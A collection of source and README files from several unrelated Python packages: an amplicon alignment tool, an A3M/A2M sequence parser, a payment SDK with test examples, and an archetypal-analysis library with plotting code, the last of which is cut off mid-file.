This program implements the progressive algorithm to align a large set
of amplicons to a reference gene consensus, or a large set of sequences
to an amplicon consensus, based on a reference consensus. This program
makes use of traditional multiple aligners such as MAFFT (default), and
muscle, and can be extended to other aligners.
## Problem
Some taxonomic assignment software require a set of align sequences,
both in the query as in the reference. Projects such as those using
environmental DNA (eDNA) or trying to assess wide diversity using
metagenomics often have a hard time creating such alignments, because of
memory and computational restrictions. Another observation is that
massive alignments often introduce more gaps in the sequences, and force
alignment of segments that should not align in that region.
Here is where A2G<sup>2</sup> will use a global to local alignment to
avoid such issues, and retained the ungapped alignment of the amplicons.
## Basic usage
A2G<sup>2</sup> will give you help by:
```bash
A2G -h
```
this should give you something like this:
```bash
A2G version: 2020.0.1
Copyright 2020 Jose Sergio Hleap
usage: A2G [-h] [--cpus CPUS] [--nowrite] [--out_prefix OUT_PREFIX]
[--remove_duplicates]
global_consensus local_consensus fasta
positional arguments:
global_consensus Sequence consensus of the global region, e.g. full COI
local_consensus Sequence consensus of the local region, e.g. Leray
fragment
fasta fasta file with the focal sequences
optional arguments:
-h, --help show this help message and exit
--cpus CPUS number of cpus to use
--nowrite return string instead of writing
--out_prefix OUT_PREFIX
Prefix of outputs
--remove_duplicates Keep or remove duplicated sequences
```
Then to run it, you can simply type:
```bash
A2G global_target local_target query_file --cpus 10 --out_prefix prefix --remove_duplicates
```
With this command, you will use the `global_target` as the overall region, the `local_target` as the amplicon reference
sequence to anchor the query sequences, and `query_file` contains your query sequences. Those are the required
arguments. The optional arguments allow you to control the execution. `--cpus` allow you to provide the number of cpus
to use. In the example, up to 10 cpus will be used. `--out_prefix`change the prefix of the outputs generated. Finally,
the `--remove_duplicates` option will retain only unique sequences.
If the `no_write` option is used, A2G<sup>2</sup> will output the alignment
to standard out, and other info to standard error. If you would like to pipe
only the alignment, you can redirect the standard error to a null device:
```bash
A2G global_target local_target query_file --cpus 10 --out_prefix prefix --no_write 2> /dev/null
```
| A2G | /A2G-2020.0.1.tar.gz/A2G-2020.0.1/README.md | README.md |
import Bio.SeqIO
from Bio.SeqIO.FastaIO import SimpleFastaParser, FastaIterator
from Bio.Alphabet import single_letter_alphabet
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
import collections
import re
try:
import itertools
from itertools import izip as zip
except ImportError:
pass
def pad(x, l, pad_char="-"):
"""Pad x with pad_char characters until it has length l"""
return x + pad_char * (l - len(x))
def insert_gaps(sequences):
"""Return a iterator over sequences that corresponds to the input sequences with gaps added"""
re_match = re.compile(r'([A-Z0-9~-])')
# split input sequences into columns of single-character match (upper case and -) states and
# variable-length inserts (lower case)
inserts = [
re_match.split(seq)
for seq in sequences
]
# for each column, determine maximum length
insert_max_lengths = [
max(
len(inserts[i][j])
for i in range(len(inserts))
)
for j in range(len(inserts[0]))
]
return (
"".join(
pad(insert, insert_len)
for insert, insert_len in zip(seq, insert_max_lengths)
)
for seq in inserts
)
def SimpleA2MA3MParser(handle, format='a3m', remove_inserts=False):
"""Simple A3M/A2M parser that returns tuples of title and sequence"""
re_insert = re.compile(r'[a-z.]')
# piggyback on the fasta parser for splitting file into title and sequence
parsed = collections.OrderedDict(SimpleFastaParser(handle))
titles = parsed.keys()
sequences = parsed.values()
if format == 'a3m' and not remove_inserts:
sequences = insert_gaps(sequences)
elif format == 'a2m' and not remove_inserts:
sequences = (
seq.replace(".", "-")
for seq in sequences
)
elif remove_inserts:
sequences = (
re_insert.sub('', seq)
for seq in sequences
)
else:
raise ValueError("Unknown format: {0}".format(format))
return zip(titles, sequences)
def A2MA3MIterator(format='a3m', remove_inserts=False):
"""Create a SeqIO-style iterator from parameters
Arguments:
format -- What input format to parse ('a3m' or 'a2m') (default: 'a3m')
remove_inserts -- Whether inserts with respect to the query sequence should be removed (default: False)
"""
def inner_iterator(handle, alphabet=single_letter_alphabet, title2ids=None):
"""Generator function to iterate over a3m records (as SeqRecord objects).
Arguments:
handle -- input file
alphabet -- optional alphabet
title2ids -- A function that, when given the title of the FASTA file (without the beginning >),
will return the id, name and description (in that order) for the record as a tuple
of strings. If this is not given, then the entire title line will be used as the
description, and the first word as the id and name.
"""
if title2ids is None:
title2ids = lambda t: (t.split(None, 1)[0], t.split(None, 1)[0], t)
for title, seq in SimpleA2MA3MParser(handle, format, remove_inserts):
id, name, description = title2ids(title)
yield SeqRecord(Seq(seq, alphabet), id=id, name=name, description=description)
return inner_iterator
def monkey_patch(name, iterator):
"""Monkey patch the Bio.SeqIO iterator registry if no such iterator exists yet"""
if name not in Bio.SeqIO._FormatToIterator:
Bio.SeqIO._FormatToIterator[name] = iterator
monkey_patch('a3m', A2MA3MIterator('a3m', False))
monkey_patch('a3m-nogaps', A2MA3MIterator('a3m', True))
monkey_patch('a2m', A2MA3MIterator('a2m', False))
monkey_patch('a2m-nogaps', A2MA3MIterator('a2m', True))
if __name__ == '__main__':
def assert_equal(iter_a, iter_b, msg):
for rec_a, rec_b in zip(iter_a, iter_b):
# assert that string representations of SeqRecords match - this is
# quite hacky and should not be done :)
assert repr(rec_a) == repr(rec_b), msg + ": " + repr((rec_a, rec_b))
# Compare our parser against output of reformat.pl from the HH-suite
a2m = list(Bio.SeqIO.parse("data/test.a2m", "a2m"))
a3m = list(Bio.SeqIO.parse("data/test.a3m", "a3m"))
fas = list(Bio.SeqIO.parse("data/test.fasta", "fasta"))
assert_equal(a2m, a3m, "a2m vs a3m")
assert_equal(a3m, fas, "a3m vs fas")
assert_equal(a2m, fas, "a2m vs fas")
a2m_ng = list(Bio.SeqIO.parse("data/test.a2m", "a3m-nogaps"))
a3m_ng = list(Bio.SeqIO.parse("data/test.a3m", "a3m-nogaps"))
fas_ng = list(Bio.SeqIO.parse("data/test.fasta_nogaps", "fasta"))
assert_equal(a2m_ng, a3m_ng, "a2m_ng vs a3m_ng")
assert_equal(a3m_ng, fas_ng, "a3m_ng vs fas_ng")
assert_equal(a2m_ng, fas_ng, "a2m_ng vs fas_ng") | A3MIO | /A3MIO-0.0.1.tar.gz/A3MIO-0.0.1/A3MIO.py | A3MIO.py |
# a3sdk
## Установка и использование библиотеки
**Установка**
Библиотеку возможно установить при помощи утилиты `pip`:
pip install A3SDK==0.0.1
**Использование**
```python
from A3SDK import Tokenizer
from A3SDK import PF
```
## Tokenizer
```python
tokenizer = Tokenizer()
tokenizer.is_test = True
```
```python
tokenizer.get_token(
systemId='EXAMPLE',
**{
"systemId": "EXAMPLE",
"cardNumber": "2200000000000000",
"cardCVV": "000",
"cardExp": "1111",
"cardHolder": "CARD OWNER",
"orderId": "1"
})
```
## ProcessingFront
```python
pf = PF()
pf.is_test = True
```
### Method `initPayment`
```python
pf.cancelPayment(
systemID='EXAMPLE',
orderID='560ce567-dd57-4d3b-a1b5-d358ce932810'
)
```
### Method `initAuthentication`
```python
...
```
### Method `cancelPayment`
```python
pf.cancelPayment(systemID='EXAMPLE', orderID='560ce567-dd57-4d3b-a1b5-d358ce932810')
```
### Method `enableRecurringKey`
```python
pf.enableRecurringKey(systemID='EXAMPLE', key='1000000000', user={'phone': '9150000000'})
```
```python
{
'code': 3,
'description': 'Ключ не найден [key=1000000000].'
}
```
### Method `getPaymentInfo`
```python
pf.getPaymentInfo(**dict(systemID='EXAMPLE', orderID='38d2aefe-21ea-4e3b-91aa-05d9905f2d21'))
```
Примерный ответ
```python
{
'operationResult': {
'code': 1,
'description': 'OK'
},
'orderID': '38d2aefe-21ea-4e3b-91aa-05d9905f2d21',
'authCode': '111111',
'terminal': '11111111',
'cardNumber': '220000******0000',
'bills': None,
'trID': 1000000000
}
```
### Method `getPaymentStatus`
```python
pf.getPaymentStatus(**dict(systemID='EXAMPLE', orderID='38d2aefe-21ea-4e3b-91aa-05d9905f2d21'))
```
Примерный ответ
```python
{
'operationResult': {
'code': 1,
'description': 'OK'
},
'orderStatus': {
'orderID': '38d2aefe-21ea-4e3b-91aa-05d9905f2d21',
'trStatus': '2',
'trStatusDesc': None,
'trChangeDateTime': None,
'authCode': '111111',
'terminal': '11111111',
'cardNumber': '220000******0000',
'trID': '1000000000'
}
}
```
### Method `dailyReportRequest`
```python
pf.dailyReportRequest(
systemID='EXAMPLE',
date='2017-08-07',
status=2,
signature=''
)
```
Примерный ответ
```python
{
"operationResult": {
"code": 3,
"description": "Неверная подпись."
},
"orders": None
}
``` | A3SDK | /A3SDK-0.0.2.tar.gz/A3SDK-0.0.2/README.md | README.md |
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from torch import optim
from timeit import default_timer as timer
from scipy.special import softmax
from AAM.AA_result_class import _CAA_result
from AAM.loading_bar_class import _loading_bar
class _TSAA:
def _logOdds(self, X):
Ordinals = range(int(min(X.flatten())), int(max(X.flatten()+1)))
probs = [(np.count_nonzero(X.flatten() == e))/len(X.flatten()) for e in Ordinals]
baseline = max(probs)
logvals = [np.log(probs[i]/baseline) for i in range(len(probs))]
return logvals
def _applySoftmax(self,M):
return softmax(M)
def _convertScores(self, X):
Ordinals = range(int(min(X.flatten())), int(max(X.flatten()+1)))
thetas = self._applySoftmax(self._logOdds(X))
scores = [1+((k+1)-1)*thetas[k] for k in range(len(Ordinals))]
return scores
def _projectOrdinals(self, X):
M, N = X.shape
X_hat = np.empty((M, N))
scores = self._convertScores(X)
for i in range(M):
for j in range(N):
idx = X[i,j]-1
X_hat[i,j] = scores[idx]
return X_hat
def _error(self, X,B,A):
return torch.norm(X - X@B@A, p='fro')**2
def _apply_constraints(self, A):
m = nn.Softmax(dim=0)
return m(A)
############# Two-step ordinal AA #############
def _compute_archetypes(self, X, K, p, n_iter, lr, mute,columns, with_synthetic_data = False, early_stopping = False):
##### Project the data #####
# Xt = torch.tensor(X, dtype = torch.long)
X_hat = self._projectOrdinals(X)
X_hat = torch.tensor(X_hat)
########## INITIALIZATION ##########
self.RSS = []
start = timer()
if not mute:
loading_bar = _loading_bar(n_iter, "Conventional Arhcetypal Analysis")
N, _ = X.T.shape
A = torch.autograd.Variable(torch.rand(K, N), requires_grad=True)
B = torch.autograd.Variable(torch.rand(N, K), requires_grad=True)
optimizer = optim.Adam([A, B], amsgrad = False, lr = lr)
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(X_hat, self._apply_constraints(B).double(), self._apply_constraints(A).double())
self.RSS.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.RSS) > 200 and (self.RSS[-round(len(self.RSS)/100)]-self.RSS[-1]) < ((self.RSS[0]-self.RSS[-1])*1e-4):
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints(A).detach().numpy()
B_f = self._apply_constraints(B).detach().numpy()
Z_f = X @ self._apply_constraints(B).detach().numpy()
X_hat_f = X_hat.detach().numpy()
end = timer()
time = round(end-start,2)
result = _CAA_result(A_f, B_f, X, X_hat_f, n_iter, self.RSS, Z_f, K, p, time,columns,"TSAA", with_synthetic_data = with_synthetic_data)
if not mute:
result._print()
return result | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/TSAA_class.py | TSAA_class.py |
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
########## PLOTS CLASS ##########
class _plots:
def _PCA_scatter_plot(self,Z,X,type,save_fig,filename, title):
pca = PCA(n_components=2)
pca.fit(Z.T)
Z_pca = pca.transform(Z.T)
X_pca = pca.transform(X.T)
plt.rcParams["figure.figsize"] = (10,10)
plt.scatter(X_pca[:,0], X_pca[:,1], c ="black", s = 1)
for a in range(len(Z[0,:])):
plt.scatter(Z_pca[a,0], Z_pca[a,1], marker ="^", s = 500, label="Archetype {0}".format(a+1))
plt.xlabel("Principal Component 1", fontsize=15)
plt.ylabel("Principal Component 2", fontsize=15)
if title == "":
plt.title(f"PCA Scatter Plot of {type}", fontsize = 20)
else:
plt.title(title, fontsize = 20)
plt.legend(prop={'size': 15})
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _attribute_scatter_plot(self,Z,X,attributes,type,p, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
plt.scatter(X[attributes[0]-1,:]*p, X[attributes[1]-1,:]*p, c ="black", s = 1)
for a in range(len(Z[0,:])):
plt.scatter(Z[attributes[0]-1,a]*p, Z[attributes[1]-1,a]*p, marker ="^", s = 500, label="Archetype {0}".format(a+1))
plt.xlabel(f"Attribute {attributes[0]}", fontsize=15)
plt.ylabel(f"Attribute {attributes[1]}", fontsize=15)
plt.legend(prop={'size': 15})
if title == "":
plt.title(f"Attribute Scatter Plot of {type}", fontsize = 20)
else:
plt.title(title, fontsize = 20)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _loss_plot(self,loss,type, save_fig, filename,title):
plt.plot(loss, c="#2c6c8c")
plt.xlabel(f"Iteration of {type}")
plt.ylabel(f"Loss of {type}")
if title == "":
plt.title(f"Loss w.r.t. Itteration of {type}")
else:
plt.title(title)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _mixture_plot(self,Z,A,type, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
fig = plt.figure()
ax = fig.add_subplot(111)
K = len(Z.T)
corners = []
for k in range(K):
corners.append([np.cos(((2*np.pi)/K)*(k)), np.sin(((2*np.pi)/K)*(k))])
plt.plot(
np.cos(((2*np.pi)/K)*(k)),
np.sin(((2*np.pi)/K)*(k)),
marker="o", markersize=12,
markeredgecolor="black",
zorder=10,
label = "Archetype {0}".format(k+1))
points_x = []
points_y = []
for p in A.T:
x = 0
y = 0
for k in range(K):
x += p[k] * np.cos(((2*np.pi)/K)*(k))
y += p[k] * np.sin(((2*np.pi)/K)*(k))
points_x.append(x)
points_y.append(y)
p = Polygon(corners, closed=False,zorder=0)
ax.add_patch(p)
ax.set_xlim(-1.1,1.1)
ax.set_ylim(-1.1,1.1)
ax.set_aspect('equal')
if title == "":
plt.title(f"Mixture Plot of {type}", fontsize = 20)
else:
plt.title(title, fontsize = 20)
plt.scatter(points_x, points_y, c ="black", s = 1, zorder=5)
plt.legend()
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _barplot(self,Z,columns, archetype_number,type,p, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
archetype = Z.T[archetype_number-1]
if type in ["OAA","RBOAA"]:
archetype *=p
fig, ax = plt.subplots()
ax.set_ylabel('Value')
plt.xlabel('Attributes')
if title == "":
ax.set_title(f"Value-Distribution of Archeype {archetype_number}")
else:
ax.set_title(title)
ax.bar(np.arange(len(archetype)),archetype)
ax.set_xticks(np.arange(len(archetype)))
ax.set_xticklabels(labels=columns)
plt.ylim(0, p+0.5)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor")
fig.set_size_inches(10, 10)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _barplot_all(self,Z,columns,type, p, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
data = []
names = ["Attributes"]
for (arch, column) in zip(Z,columns):
current_data = [column]
for value in arch:
if type in ["OAA","RBOAA"]:
value *=p
current_data.append(value)
data.append(current_data)
for i in range(len(Z.T)):
names.append("Archetype {0}".format(i+1))
df=pd.DataFrame(data,columns=names)
df.plot(x="Attributes", y=names[1:], kind="bar",figsize=(10,10))
plt.ylim(0.0, p+0.5)
plt.ylabel(f"Value")
if title == "":
plt.title(f"Value-Distribution over All Archetypes")
else:
plt.title(title)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _typal_plot(self, Z, types, weighted, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
fig, ax = plt.subplots()
type_names = types.keys()
type_names_display = list(types.keys())
labels = [f"Archetype {i}" for i in range(len(Z.T))]
width = 0.5
bottoms = []
bottoms.append([0 for i in range(len(Z.T))])
values = []
for label in type_names:
label_values = []
for archetype in Z.T:
archetype_value = 0
for i in types[label-1]:
archetype_value += archetype[i]
if weighted in ["equal","equal_norm"]:
archetype_value = archetype_value / len(types[label])
label_values.append(archetype_value)
values.append(label_values)
values_new = np.array(values)
if weighted in ["norm","equal_norm"]:
for i in range(len(values)):
values_new[i] = values_new[i] / np.sum(values,0)
for i in range(len(values)-1):
bottoms.append([b + l for (b,l) in zip(bottoms[-1],values_new[i])])
for i in range(len(values)):
ax.bar(labels, values_new[i], width, bottom=bottoms[i], label=type_names_display[i])
ax.set_ylabel('Value')
if title == "":
ax.set_title('Typal Composition of Archetypes')
else:
ax.set_title(title)
ax.legend()
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _pie_chart(self, A, indexes, attribute_indexes, archetype_dataframe, save_fig, filename,title):
data = []
if attribute_indexes == []:
for i in range(len(indexes)):
datapoint = A.T[indexes[i]]
if len(data) == 0:
data = datapoint
else:
data = data + datapoint / 2
else:
data_subset = archetype_dataframe.copy()
for pair in attribute_indexes:
if pair[1] == "=":
data_subset = data_subset.loc[data_subset[pair[0]] == pair[2]]
elif pair[1] == "<":
data_subset = data_subset.loc[data_subset[pair[0]] < pair[2]]
elif pair[1] == ">":
data_subset = data_subset.loc[data_subset[pair[0]] > pair[2]]
if data_subset.shape[0] < 1:
print("\nThere are no datapoints with the value(s) given by the 'attribute_indexes' parameter.")
return
for i in range(data_subset.shape[0]):
datapoint = A.T[i]
if len(data) == 0:
data = datapoint
else:
data = data + datapoint / 2
labels = []
explode = []
for i in range(len(A.T[0])):
labels.append("Archetype {0}".format(i+1))
if data[i] == np.max(data):
explode.append(0.1)
else:
explode.append(0.0)
plt.pie(data,explode=tuple(explode), labels = labels, shadow=True, startangle=90, autopct='%1.1f%%')
if title == "":
plt.title("Pie Chart of Archetype Distribution on Given Subset of Data")
else:
plt.title(title)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _attribute_distribution(self, A, Z, indexes, columns, p, type, attribute_indexes, archetype_dataframe, save_fig, filename, title):
archetype_distribution = []
if attribute_indexes == []:
for i in range(len(indexes)):
datapoint = A.T[indexes[i]]
if len(archetype_distribution) == 0:
archetype_distribution = datapoint
else:
archetype_distribution = archetype_distribution + datapoint / 2
else:
data_subset = archetype_dataframe.copy()
for pair in attribute_indexes:
if pair[1] == "=":
data_subset = data_subset.loc[data_subset[pair[0]] == pair[2]]
elif pair[1] == "<":
data_subset = data_subset.loc[data_subset[pair[0]] < pair[2]]
elif pair[1] == ">":
data_subset = data_subset.loc[data_subset[pair[0]] > pair[2]]
if data_subset.shape[0] < 1:
print("\nThere are no datapoints with the value {0} of attribute {1}.\n".format(attribute_indexes[1],attribute_indexes[0]))
return
for i in range(data_subset.shape[0]):
datapoint = A.T[i]
if len(archetype_distribution) == 0:
archetype_distribution = datapoint
else:
archetype_distribution = archetype_distribution + datapoint / 2
archetype_distribution = archetype_distribution/np.sum(archetype_distribution)
attribute_distribution = []
for a in range(len(archetype_distribution)):
if len(attribute_distribution) == 0:
attribute_distribution = Z.T[a]*archetype_distribution[a]
else:
attribute_distribution += Z.T[a]*archetype_distribution[a]
plt.rcParams["figure.figsize"] = (10,10)
if type in ["OAA","RBOAA"]:
attribute_distribution *=p
fig, ax = plt.subplots()
ax.set_ylabel('Value')
plt.xlabel('Attributes')
if title == "":
ax.set_title(f"Value-Distribution of Archetype")
else:
ax.set_title(title)
ax.bar(np.arange(len(attribute_distribution)),attribute_distribution)
ax.set_xticks(np.arange(len(attribute_distribution)))
ax.set_xticklabels(labels=columns)
plt.ylim(0, p+0.5)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor")
fig.set_size_inches(10, 10)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _circular_typal_barplot(self, type, Z, types, archetype_number,columns,p, save_fig, filename, title):
archetype = Z.T[archetype_number-1]
if type in ["OAA","RBOAA"]:
archetype *=p
type_values = []
type_names = types.keys()
for type in type_names:
type_value = 0
for attribute in types[type]:
type_value += archetype[attribute-1]
type_values.append(type_value/len(types[type]))
archetype = type_values
ANGLES = np.linspace(0.0, 2 * np.pi - 0.0, len(archetype), endpoint=False)
width = 1/(len(archetype)/6.3)
fig, ax = plt.subplots(figsize=(9, 12.6), subplot_kw={"projection": "polar"})
fig.patch.set_facecolor("white")
ax.set_facecolor("#dae5eb")
ax.set_theta_offset(1.2 * np.pi / 2)
ax.set_ylim(0, p)
ax.bar(ANGLES, archetype, alpha=0.9, width=width, zorder=10)
ax.vlines(ANGLES, 0, p, ls=(0, (4, 4)), zorder=11)
ax.set_xticks(ANGLES)
ax.set_xticklabels(type_names, size=12)
if title == "":
ax.set_title("Circular Typal Barplot of Archetype {0}".format(archetype_number),size = 25)
else:
ax.set_title(title,size = 25)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300) | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/plots_class.py | plots_class.py |
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from timeit import default_timer as timer
from AAM.AA_result_class import _OAA_result
from AAM.loading_bar_class import _loading_bar
from AAM.OAA_class import _OAA
########## ORDINAL ARCHETYPAL ANALYSIS CLASS ##########
class _RBOAA:
########## HELPER FUNCTION // EARLY STOPPING ##########
def _early_stopping(self):
next_imp = self.loss[-round(len(self.loss)/100)]-self.loss[-1]
prev_imp = (self.loss[0]-self.loss[-1])*1e-5
return next_imp < prev_imp
########## HELPER FUNCTION // A AND B ##########
def _apply_constraints_AB(self,A):
m = nn.Softmax(dim=1)
return m(A)
########## HELPER FUNCTION // BETAS ##########
def _apply_constraints_beta(self,b):
betas = torch.empty((self.N,self.p+1))
betas[:,0] = 0
betas[:, 1:self.p+1] = torch.cumsum(torch.nn.functional.softmax(b.clone(),dim=1),dim=1)
return betas
########## HELPER FUNCTION // SIGMA ##########
def _apply_constraints_sigma(self,sigma):
m = nn.Softplus()
return m(sigma)
########## HELPER FUNCTION // ALPHA ##########
def _calculate_alpha(self,b):
alphas = (b[:,0:self.p] + b[:,1:self.p+1]) / 2
return alphas
########## HELPER FUNCTION // X_tilde ##########
def _calculate_X_tilde(self,X,alphas):
X_tilde = torch.gather(alphas,1,X-1)
return X_tilde
########## HELPER FUNCTION // X_hat ##########
def _calculate_X_hat(self,X_tilde,A,B):
Z = B @ X_tilde
X_hat = A @ Z
return X_hat
########## HELPER FUNCTION // LOSS ##########
def _calculate_loss(self,Xt, X_hat, b, sigma):
z_next = (torch.gather(b,1,Xt)-X_hat)/sigma
z_prev = (torch.gather(b,1,Xt-1)-X_hat)/sigma
z_next[Xt == len(b[0,:])+1] = np.inf
z_prev[Xt == 1] = -np.inf
P_next = torch.distributions.normal.Normal(0, 1).cdf(z_next)
P_prev = torch.distributions.normal.Normal(0, 1).cdf(z_prev)
neg_logP = -torch.log(( P_next - P_prev ) +1e-10)
loss = torch.sum(neg_logP)
return loss
########## HELPER FUNCTION // ERROR ##########
def _error(self,Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint):
A = self._apply_constraints_AB(A_non_constraint)
B = self._apply_constraints_AB(B_non_constraint)
b = self._apply_constraints_beta(b_non_constraint)
sigma = self._apply_constraints_sigma(sigma_non_constraint)
alphas = self._calculate_alpha(b)
X_tilde = self._calculate_X_tilde(Xt,alphas)
X_hat = self._calculate_X_hat(X_tilde,A,B)
loss = self._calculate_loss(Xt, X_hat, b, sigma)
return loss
########## COMPUTE ARCHETYPES FUNCTION OF OAA ##########
def _compute_archetypes(self,
X, K, p, n_iter, lr, mute, columns,
with_synthetic_data = False,
early_stopping = False,
with_OAA_initialization = False):
########## INITIALIZATION ##########
self.N, self.M = len(X.T), len(X.T[0,:])
Xt = torch.tensor(X.T, dtype = torch.long)
self.N_arange = [m for m in range(self.M) for n in range(self.N)]
self.M_arange = [n for n in range(self.N) for m in range(self.M)]
self.p = p
self.loss = []
start = timer()
if with_OAA_initialization:
if not mute:
print("\nPerforming OAA for initialization of ROBAA.")
OAA = _OAA()
A_hot, B_hot, sigma_hot, b_hot = OAA._compute_archetypes(X, K, p, n_iter, 0.01, mute, columns, with_synthetic_data = with_synthetic_data, early_stopping = early_stopping, for_hotstart_usage=True)
A_non_constraint = torch.autograd.Variable(torch.tensor(A_hot), requires_grad=True)
B_non_constraint = torch.autograd.Variable(torch.tensor(B_hot), requires_grad=True)
sigma_non_constraint = torch.autograd.Variable(torch.tensor(sigma_hot).repeat(self.N,1), requires_grad=True)
b_non_constraint = torch.autograd.Variable(torch.tensor(b_hot).repeat(self.N,1), requires_grad=True)
else:
A_non_constraint = torch.autograd.Variable(torch.randn(self.N, K), requires_grad=True)
B_non_constraint = torch.autograd.Variable(torch.randn(K, self.N), requires_grad=True)
sigma_non_constraint = torch.autograd.Variable(torch.randn(1).repeat(self.N,1), requires_grad=True)
b_non_constraint = torch.autograd.Variable(torch.rand(self.N,p), requires_grad=True)
optimizer = optim.Adam([A_non_constraint,
B_non_constraint,
b_non_constraint,
sigma_non_constraint], amsgrad = True, lr = lr)
if not mute:
loading_bar = _loading_bar(n_iter, "Response Bias Ordinal Archetypal Analysis")
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint)
self.loss.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.loss) > 200 and self._early_stopping():
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints_AB(A_non_constraint).detach().numpy()
B_f = self._apply_constraints_AB(B_non_constraint).detach().numpy()
b_f = self._apply_constraints_beta(b_non_constraint)
alphas_f = self._calculate_alpha(b_f)
X_tilde_f = self._calculate_X_tilde(Xt,alphas_f).detach().numpy()
Z_tilde_f = (self._apply_constraints_AB(B_non_constraint).detach().numpy() @ X_tilde_f)
sigma_f = self._apply_constraints_sigma(sigma_non_constraint).detach().numpy()
X_hat_f = self._calculate_X_hat(X_tilde_f,A_f,B_f)
end = timer()
time = round(end-start,2)
Z_f = B_f @ X_tilde_f
########## CREATE RESULT INSTANCE ##########
result = _OAA_result(
A_f.T,
B_f.T,
X,
n_iter,
b_f.detach().numpy()[:,1:-1],
Z_f.T,
X_tilde_f.T,
Z_tilde_f.T,
X_hat_f.T,
self.loss,
K,
p,
time,
columns,
"RBOAA",
sigma_f,
with_synthetic_data=with_synthetic_data)
if not mute:
result._print()
return result | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/RBOAA_class.py | RBOAA_class.py |
from AAM.CAA_class import _CAA
from AAM.OAA_class import _OAA
from AAM.RBOAA_class import _RBOAA
from AAM.TSAA_class import _TSAA
from AAM.synthetic_data_class import _synthetic_data
import pandas as pd
import numpy as np
import pickle
from os import path
########## ARCHETYPAL ANALYSIS MODULE CLASS ##########
class AA:
def __init__(self):
import AAM.AA_result_class as AA_result_class
self._CAA = _CAA()
self._OAA = _OAA()
self._RBOAA = _RBOAA()
self._TSAA = _TSAA()
self._results = {"CAA": [], "OAA": [], "RBOAA": [], "TSAA": []}
self._synthetic_results = {"CAA": [], "OAA": [], "RBOAA": [], "TSAA": []}
self._has_data = False
self.has_synthetic_data = False
self.has_dataframe = False
self.has_archetype_dataframe = False
self.archetype_dataframe = pd.DataFrame()
self.has_ranked_archetype_dataframe = False
self.ranked_archetype_dataframe = pd.DataFrame()
def load_data(self, X: np.ndarray, columns: list()):
self.columns = columns
self.X = X
self.N, self.M = X.shape
self._has_data = True
if self.N<self.M:
print("Your data has more attributes than subjects.")
print(f"Your data has {self.M} attributes and {self.N} subjects.")
print("This is highly unusual for this type of data.")
print("Please try loading transposed data instead.")
else:
print(f"\nThe data was loaded successfully!\n")
def load_csv(self, filename: str, columns: list(), rows: int = None, mute: bool = False):
self.columns, self.M, self.N, self.X = self._clean_data(filename, columns, rows)
self._has_data = True
if not mute:
print(f"\nThe data of \'{filename}\' was loaded successfully!\n")
def _clean_data(self, filename, columns, rows):
df = pd.read_csv(filename)
column_names = df.columns.to_numpy()
if not columns is None:
column_names = column_names[columns]
X = df[column_names]
else:
X = df[column_names]
if not rows is None:
X = X.iloc[range(rows),:]
self.has_dataframe = True
self.dataframe = df.iloc[range(rows),:]
else:
self.has_dataframe = True
self.dataframe = df
X = X.to_numpy().T
M, N = X.shape
return column_names, M, N, X
def create_synthetic_data(self, N: int = 1000, M: int = 10, K: int = 3, p: int = 6, sigma: float = -20.0, rb: bool = False, b_param: float = 100, a_param: float = 1, sigma_dev: float = 0, mute = False):
if N < 2:
print("The value of N can't be less than 2. The value specified was {0}".format(N))
elif M < 2:
print("The value of M can't be less than 2. The value specified was {0}".format(M))
elif K < 2:
print("The value of K can't be less than 2. The value specified was {0}".format(K))
elif p < 2:
print("The value of p can't be less than 2. The value specified was {0}".format(p))
else:
self._synthetic_data = _synthetic_data(N, M, K, p, sigma, rb, a_param, b_param, sigma_std = sigma_dev)
self.has_synthetic_data = True
self._synthetic_results = {"CAA": [], "OAA": [], "RBOAA": [], "TSAA": []}
if not mute:
print("\nThe synthetic data was successfully created! To use the data in an analysis, specificy the with_synthetic_data parameter as True.\n")
def analyse(self, K: int = 3, p: int = 6, n_iter: int = 1000, early_stopping: bool = True, model_type = "all", lr: float = 0.01, mute: bool = False, with_synthetic_data: bool = False, with_hot_start: bool = False):
success = True
if model_type == "TSAA":
print("The model_type TSAA has been deprecated, due to errors in the method.")
success = False
elif self._has_data and not with_synthetic_data:
